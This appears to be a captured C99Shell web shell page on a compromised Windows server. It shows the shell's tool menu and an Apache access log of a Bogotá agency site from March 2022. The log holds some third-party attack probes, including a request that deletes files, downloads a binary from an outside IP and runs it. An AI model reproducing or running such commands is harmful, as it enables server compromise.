!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.03.15.log (1.51 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
103.89.253.70 - - [15/Mar/2022:00:00:36 -0500] "GET / HTTP/1.1" 200 319
157.55.39.218 - - [15/Mar/2022:00:01:54 -0500] "GET /bla/resoluciones/autos%202019/1433.pdf HTTP/1.1" 200 276120
201.245.192.253 - - [15/Mar/2022:00:01:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117382
216.245.221.92 - - [15/Mar/2022:00:06:27 -0500] "HEAD / HTTP/1.1" 200 -
23.95.100.141 - - [15/Mar/2022:00:08:03 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
152.61.192.232 - - [15/Mar/2022:00:10:53 -0500] "GET / HTTP/1.1" 200 319
207.46.13.159 - - [15/Mar/2022:00:11:02 -0500] "GET /bla/resoluciones/autos%202014/0489.pdf HTTP/1.1" 200 463877
186.167.249.76 - - [15/Mar/2022:00:11:04 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [15/Mar/2022:00:11:27 -0500] "HEAD / HTTP/1.1" 200 -
152.61.128.50 - - [15/Mar/2022:00:12:30 -0500] "GET / HTTP/1.1" 200 319
157.55.39.132 - - [15/Mar/2022:00:12:43 -0500] "-" 408 -
201.245.192.253 - - [15/Mar/2022:00:12:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117090
216.245.221.92 - - [15/Mar/2022:00:16:27 -0500] "HEAD / HTTP/1.1" 200 -
191.156.54.150 - - [15/Mar/2022:00:17:36 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
207.46.13.7 - - [15/Mar/2022:00:19:03 -0500] "GET /bla/resoluciones/autos%202019/4499.pdf HTTP/1.1" 200 289224
216.245.221.92 - - [15/Mar/2022:00:21:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:00:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45637
201.245.192.253 - - [15/Mar/2022:00:21:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117090
201.245.192.253 - - [15/Mar/2022:00:21:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46133
173.252.87.6 - - [15/Mar/2022:00:22:20 -0500] "GET /ciudad-bolivar-y-puente-aranda-se-alistan-para-una-nueva-llantaton.html HTTP/1.1" 206 991
152.61.128.50 - - [15/Mar/2022:00:24:23 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [15/Mar/2022:00:24:25 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [15/Mar/2022:00:24:25 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [15/Mar/2022:00:26:27 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.159 - - [15/Mar/2022:00:26:52 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
207.46.13.209 - - [15/Mar/2022:00:26:53 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
40.77.167.26 - - [15/Mar/2022:00:26:55 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
207.46.13.159 - - [15/Mar/2022:00:26:55 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
203.184.132.168 - - [15/Mar/2022:00:29:35 -0500] "GET /portaldeninos/ HTTP/1.1" 200 154220
216.245.221.92 - - [15/Mar/2022:00:31:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:00:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45637
66.249.73.97 - - [15/Mar/2022:00:31:45 -0500] "-" 408 -
201.245.192.253 - - [15/Mar/2022:00:31:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46133
201.245.192.253 - - [15/Mar/2022:00:32:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117090
79.110.73.241 - - [15/Mar/2022:00:33:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2025.pdf HTTP/1.1" 200 363032
207.46.13.159 - - [15/Mar/2022:00:35:04 -0500] "GET /bla/resoluciones/autos%202014/0728.pdf HTTP/1.1" 200 438477
203.184.132.168 - - [15/Mar/2022:00:35:27 -0500] "GET /portaldeninos/aulas-ambientales/ HTTP/1.1" 200 81238
203.184.132.168 - - [15/Mar/2022:00:35:33 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 83021
203.184.132.168 - - [15/Mar/2022:00:35:37 -0500] "GET /portaldeninos/aulas-ambientales-2/parque-ecologico-distrital-de-montana-entrenubes/ HTTP/1.1" 200 83228
203.184.132.168 - - [15/Mar/2022:00:35:40 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 82418
203.184.132.168 - - [15/Mar/2022:00:35:43 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 82677
203.184.132.168 - - [15/Mar/2022:00:35:48 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 82128
178.73.215.171 - - [15/Mar/2022:00:35:53 -0500] "GET / HTTP/1.0" 200 319
203.184.132.168 - - [15/Mar/2022:00:35:52 -0500] "GET /portaldeninos/los-animales/ HTTP/1.1" 200 102935
203.184.132.168 - - [15/Mar/2022:00:35:55 -0500] "GET /portaldeninos/los-arboles/ HTTP/1.1" 200 80368
203.184.132.168 - - [15/Mar/2022:00:35:58 -0500] "GET /portaldeninos/los-arboles/tips/ HTTP/1.1" 200 80499
203.184.132.168 - - [15/Mar/2022:00:36:02 -0500] "GET /portaldeninos/tipos-de-arboles-en-bogota/ HTTP/1.1" 200 102624
203.184.132.168 - - [15/Mar/2022:00:36:06 -0500] "GET /portaldeninos/fauna/ HTTP/1.1" 200 81251
203.184.132.168 - - [15/Mar/2022:00:36:09 -0500] "GET /portaldeninos/aire/ HTTP/1.1" 200 81037
203.184.132.168 - - [15/Mar/2022:00:36:12 -0500] "GET /portaldeninos/ruido/ HTTP/1.1" 200 81316
203.184.132.168 - - [15/Mar/2022:00:36:19 -0500] "GET /portaldeninos/publicidad/ HTTP/1.1" 200 80391
203.184.132.168 - - [15/Mar/2022:00:36:22 -0500] "GET /portaldeninos/glosario/ HTTP/1.1" 200 90020
216.245.221.92 - - [15/Mar/2022:00:36:27 -0500] "HEAD / HTTP/1.1" 200 -
203.184.132.168 - - [15/Mar/2022:00:36:26 -0500] "GET /portaldeninos/corresponsal-ambiental/ HTTP/1.1" 200 86590
203.184.132.168 - - [15/Mar/2022:00:36:30 -0500] "GET /portaldeninos/humedales-ramsar/ HTTP/1.1" 200 82077
203.184.132.168 - - [15/Mar/2022:00:36:35 -0500] "GET /portaldeninos/humedal-tibanica-2/ HTTP/1.1" 200 80593
203.184.132.168 - - [15/Mar/2022:00:36:41 -0500] "GET /portaldeninos/humedal-torca-y-guaymaral-2/ HTTP/1.1" 200 80908
203.184.132.168 - - [15/Mar/2022:00:36:46 -0500] "GET /portaldeninos/humedal-santa-maria-del-lago/ HTTP/1.1" 200 81810
203.184.132.168 - - [15/Mar/2022:00:36:49 -0500] "GET /portaldeninos/humedal-la-vaca-2/ HTTP/1.1" 200 80659
203.184.132.168 - - [15/Mar/2022:00:36:52 -0500] "GET /portaldeninos/humedal-la-conejera-2/ HTTP/1.1" 200 80842
203.184.132.168 - - [15/Mar/2022:00:36:57 -0500] "GET /portaldeninos/humedal-juan-amarillo-2/ HTTP/1.1" 200 80977
203.184.132.168 - - [15/Mar/2022:00:37:01 -0500] "GET /portaldeninos/humedal-jaboque-2/ HTTP/1.1" 200 80668
203.184.132.168 - - [15/Mar/2022:00:37:04 -0500] "GET /portaldeninos/humedal-el-tunjo/ HTTP/1.1" 200 80483
203.184.132.168 - - [15/Mar/2022:00:37:07 -0500] "GET /portaldeninos/humedal-el-burro-2/ HTTP/1.1" 200 80748
203.184.132.168 - - [15/Mar/2022:00:37:10 -0500] "GET /portaldeninos/humedal-capellania-2/ HTTP/1.1" 200 80771
203.184.132.168 - - [15/Mar/2022:00:37:14 -0500] "GET /portaldeninos/humedal-cordoba-2/ HTTP/1.1" 200 80863
207.46.13.43 - - [15/Mar/2022:00:37:18 -0500] "GET /bla/resoluciones/autos%202019/3681.pdf HTTP/1.1" 200 267428
203.184.132.168 - - [15/Mar/2022:00:37:16 -0500] "GET /portaldeninos/contactanos/ HTTP/1.1" 200 80957
203.184.132.168 - - [15/Mar/2022:00:37:21 -0500] "GET /portaldeninos/gestion-del-riesgo-incendios-forestales HTTP/1.1" 301 -
203.184.132.168 - - [15/Mar/2022:00:37:23 -0500] "GET /portaldeninos/agua-y-estructura-ecologica-principal HTTP/1.1" 301 -
203.184.132.168 - - [15/Mar/2022:00:37:24 -0500] "GET /portaldeninos/agua-y-estructura-ecologica-principal/ HTTP/1.1" 200 80310
203.184.132.168 - - [15/Mar/2022:00:37:30 -0500] "GET /portaldeninos/biodiversidad HTTP/1.1" 301 -
203.184.132.168 - - [15/Mar/2022:00:37:31 -0500] "GET /portaldeninos/que-es-cambio-climatico HTTP/1.1" 301 -
203.184.132.168 - - [15/Mar/2022:00:37:32 -0500] "GET /portaldeninos/que-es-cambio-climatico/ HTTP/1.1" 200 79549
203.184.132.168 - - [15/Mar/2022:00:37:35 -0500] "GET /portaldeninos/residuos HTTP/1.1" 301 -
203.184.132.168 - - [15/Mar/2022:00:37:37 -0500] "GET /portaldeninos/residuos/ HTTP/1.1" 200 80265
40.77.167.26 - - [15/Mar/2022:00:40:07 -0500] "GET /bla/resoluciones/autos%202014/2152.pdf HTTP/1.1" 200 792505
216.245.221.92 - - [15/Mar/2022:00:41:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:00:40:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45637
201.245.192.253 - - [15/Mar/2022:00:41:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46133
40.77.188.113 - - [15/Mar/2022:00:42:56 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
40.77.188.171 - - [15/Mar/2022:00:42:56 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
40.77.189.164 - - [15/Mar/2022:00:42:56 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
40.77.188.136 - - [15/Mar/2022:00:42:57 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
40.77.189.197 - - [15/Mar/2022:00:42:57 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
40.77.188.84 - - [15/Mar/2022:00:42:57 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
40.77.190.125 - - [15/Mar/2022:00:42:57 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
201.245.192.253 - - [15/Mar/2022:00:42:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117090
186.84.22.49 - - [15/Mar/2022:00:45:29 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
157.55.39.218 - - [15/Mar/2022:00:45:57 -0500] "GET /bla/resoluciones/autos%202014/1481.pdf HTTP/1.1" 200 704064
216.245.221.92 - - [15/Mar/2022:00:46:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.100 - - [15/Mar/2022:00:48:41 -0500] "-" 408 -
207.46.13.197 - - [15/Mar/2022:00:49:48 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [15/Mar/2022:00:51:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:00:51:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117090
152.61.192.232 - - [15/Mar/2022:00:53:04 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [15/Mar/2022:00:53:05 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [15/Mar/2022:00:53:05 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
207.46.13.159 - - [15/Mar/2022:00:55:07 -0500] "GET /bla/resoluciones/autos%202014/2461.pdf HTTP/1.1" 200 545291
207.46.13.7 - - [15/Mar/2022:00:55:29 -0500] "GET /bla/resoluciones/autos%202019/0885.pdf HTTP/1.1" 200 265313
216.245.221.92 - - [15/Mar/2022:00:56:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [15/Mar/2022:00:58:11 -0500] "-" 408 -
207.46.13.186 - - [15/Mar/2022:00:59:41 -0500] "GET /portaldeninos/2021/05/17/en-el-dia-mundial-del-reciclaje-la-secretaria-de-ambiente-recuerda-la-importancia-de-separar-residuos-y-aprovecharlos/ HTTP/1.1" 200 125660
207.46.13.178 - - [15/Mar/2022:00:59:56 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
207.46.13.63 - - [15/Mar/2022:00:59:57 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
207.46.13.31 - - [15/Mar/2022:00:59:58 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
207.46.13.197 - - [15/Mar/2022:00:59:58 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
207.46.13.178 - - [15/Mar/2022:00:59:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
207.46.13.63 - - [15/Mar/2022:00:59:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
207.46.13.197 - - [15/Mar/2022:01:00:00 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
207.46.13.31 - - [15/Mar/2022:01:00:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
207.46.13.178 - - [15/Mar/2022:01:00:02 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
207.46.13.63 - - [15/Mar/2022:01:00:02 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
207.46.13.197 - - [15/Mar/2022:01:00:03 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
207.46.13.31 - - [15/Mar/2022:01:00:03 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
207.46.13.178 - - [15/Mar/2022:01:00:05 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
207.46.13.63 - - [15/Mar/2022:01:00:05 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
207.46.13.31 - - [15/Mar/2022:01:00:06 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
207.46.13.197 - - [15/Mar/2022:01:00:06 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
40.77.167.41 - - [15/Mar/2022:01:00:07 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
207.46.13.31 - - [15/Mar/2022:01:00:09 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
207.46.13.186 - - [15/Mar/2022:01:00:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
207.46.13.197 - - [15/Mar/2022:01:00:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
40.77.167.41 - - [15/Mar/2022:01:00:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
207.46.13.197 - - [15/Mar/2022:01:00:12 -0500] "GET /portaldeninos/wp-includes/js/comment-reply.min.js?ver=4.9.8 HTTP/1.1" 200 1078
207.46.13.31 - - [15/Mar/2022:01:00:12 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
207.46.13.186 - - [15/Mar/2022:01:00:12 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
40.77.167.41 - - [15/Mar/2022:01:00:13 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
207.46.13.186 - - [15/Mar/2022:01:00:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
207.46.13.197 - - [15/Mar/2022:01:00:15 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
40.77.167.41 - - [15/Mar/2022:01:00:18 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
207.46.13.186 - - [15/Mar/2022:01:00:18 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
216.245.221.92 - - [15/Mar/2022:01:01:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:01:01:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117090
207.46.13.209 - - [15/Mar/2022:01:03:48 -0500] "GET /bla/resoluciones/autos%202014/3703.pdf HTTP/1.1" 200 515894
66.249.73.127 - - [15/Mar/2022:01:04:23 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:01:06:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [15/Mar/2022:01:10:10 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:01:11:27 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.43 - - [15/Mar/2022:01:11:51 -0500] "GET /bla/resoluciones/autos%202014/2139.pdf HTTP/1.1" 200 897323
201.245.192.253 - - [15/Mar/2022:01:11:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117088
92.255.85.30 - - [15/Mar/2022:01:14:11 -0500] "\x03" 400 226
157.55.39.218 - - [15/Mar/2022:01:14:40 -0500] "GET /bla/resoluciones/autos%202014/0953.pdf HTTP/1.1" 200 336881
40.77.188.93 - - [15/Mar/2022:01:15:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
66.249.73.127 - - [15/Mar/2022:01:15:58 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:01:16:27 -0500] "HEAD / HTTP/1.1" 200 -
200.118.60.21 - - [15/Mar/2022:01:19:35 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
200.118.60.21 - - [15/Mar/2022:01:19:37 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
200.118.60.21 - - [15/Mar/2022:01:19:57 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 320912
216.245.221.92 - - [15/Mar/2022:01:21:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:01:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45633
66.249.73.127 - - [15/Mar/2022:01:21:43 -0500] "-" 408 -
201.245.192.253 - - [15/Mar/2022:01:21:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46131
201.245.192.253 - - [15/Mar/2022:01:22:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117088
181.61.206.204 - - [15/Mar/2022:01:24:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 319155
207.46.13.209 - - [15/Mar/2022:01:24:59 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
207.46.13.209 - - [15/Mar/2022:01:25:09 -0500] "GET /BLA/boletinlegal/js/ajax_doctrina.js HTTP/1.1" 200 772
157.55.39.218 - - [15/Mar/2022:01:25:10 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
207.46.13.43 - - [15/Mar/2022:01:25:12 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
207.46.13.43 - - [15/Mar/2022:01:25:15 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
207.46.13.43 - - [15/Mar/2022:01:25:18 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
216.245.221.92 - - [15/Mar/2022:01:26:27 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.26 - - [15/Mar/2022:01:27:33 -0500] "GET /bla/resoluciones/autos%202014/0867.pdf HTTP/1.1" 200 300135
216.245.221.92 - - [15/Mar/2022:01:31:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:01:30:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45633
181.215.176.138 - - [15/Mar/2022:01:31:40 -0500] "POST /auth/tokens HTTP/1.1" 404 1011
201.245.192.253 - - [15/Mar/2022:01:31:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46131
201.245.192.253 - - [15/Mar/2022:01:32:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117088
34.147.95.132 - - [15/Mar/2022:01:34:52 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [15/Mar/2022:01:36:27 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.7 - - [15/Mar/2022:01:37:06 -0500] "GET /bla/resoluciones/autos%202021/1827.pdf HTTP/1.1" 200 394995
40.77.167.101 - - [15/Mar/2022:01:37:24 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:01:41:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:01:40:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45633
201.245.192.253 - - [15/Mar/2022:01:41:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46131
201.245.192.253 - - [15/Mar/2022:01:41:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117088
216.245.221.92 - - [15/Mar/2022:01:46:27 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.159 - - [15/Mar/2022:01:47:51 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/3608.pdf HTTP/1.1" 200 311716
216.245.221.92 - - [15/Mar/2022:01:51:27 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.159 - - [15/Mar/2022:01:52:02 -0500] "GET /bla/resoluciones/autos%202014/4081.pdf HTTP/1.1" 200 550963
201.245.192.253 - - [15/Mar/2022:01:51:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117088
207.46.13.235 - - [15/Mar/2022:01:54:10 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:01:56:27 -0500] "HEAD / HTTP/1.1" 200 -
47.100.75.149 - - [15/Mar/2022:02:00:25 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.44.248/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [15/Mar/2022:02:01:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:02:02:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117088
66.249.73.127 - - [15/Mar/2022:02:03:08 -0500] "-" 408 -
207.46.13.7 - - [15/Mar/2022:02:04:28 -0500] "GET /bla/resoluciones/autos%202014/3696.pdf HTTP/1.1" 200 442555
207.46.13.209 - - [15/Mar/2022:02:04:33 -0500] "GET /bla/resoluciones/autos%202014/0771.pdf HTTP/1.1" 200 466084
216.245.221.92 - - [15/Mar/2022:02:06:27 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.159 - - [15/Mar/2022:02:06:32 -0500] "GET /bla/resoluciones/autos%202019/1963.pdf HTTP/1.1" 200 314705
66.249.73.97 - - [15/Mar/2022:02:09:23 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:02:11:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:02:11:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117066
66.249.73.127 - - [15/Mar/2022:02:15:17 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:02:16:27 -0500] "HEAD / HTTP/1.1" 200 -
181.215.176.138 - - [15/Mar/2022:02:17:29 -0500] "GET http://aws.interact.sh/metadata/v1.json HTTP/1.1" 400 226
66.249.73.127 - - [15/Mar/2022:02:21:24 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:02:21:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:02:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45639
201.245.192.253 - - [15/Mar/2022:02:21:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117066
201.245.192.253 - - [15/Mar/2022:02:21:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46109
157.55.39.218 - - [15/Mar/2022:02:22:27 -0500] "GET /BLA/boletinlegal/documentos-importantes.php HTTP/1.1" 200 4822
207.46.13.159 - - [15/Mar/2022:02:22:43 -0500] "GET /BLA/boletinlegal/js/ajax_documentos.js HTTP/1.1" 200 1155
40.77.167.26 - - [15/Mar/2022:02:22:45 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
40.77.167.26 - - [15/Mar/2022:02:22:48 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
207.46.13.209 - - [15/Mar/2022:02:23:35 -0500] "GET / HTTP/1.1" 200 319
45.137.21.141 - - [15/Mar/2022:02:24:01 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
216.245.221.92 - - [15/Mar/2022:02:26:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [15/Mar/2022:02:27:46 -0500] "-" 408 -
207.46.13.43 - - [15/Mar/2022:02:28:10 -0500] "GET /bla/resoluciones/autos%202019/2761.pdf HTTP/1.1" 200 264189
157.55.39.218 - - [15/Mar/2022:02:29:06 -0500] "GET /bla/resoluciones/autos%202014/1079.pdf HTTP/1.1" 200 623183
40.77.167.106 - - [15/Mar/2022:02:29:34 -0500] "-" 408 -
216.245.221.92 - - [15/Mar/2022:02:31:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2022:02:30:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45639
201.245.192.253 - - [15/Mar/2022:02:31:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46109
201.245.192.253 - - [15/Mar/2022:02:31:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117066
20.36.244.102 - - [15/Mar/2022:02:32:52 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
66.249.73.127 - - [15/Mar/2022:02:33:36 -0500] "-" 408 -
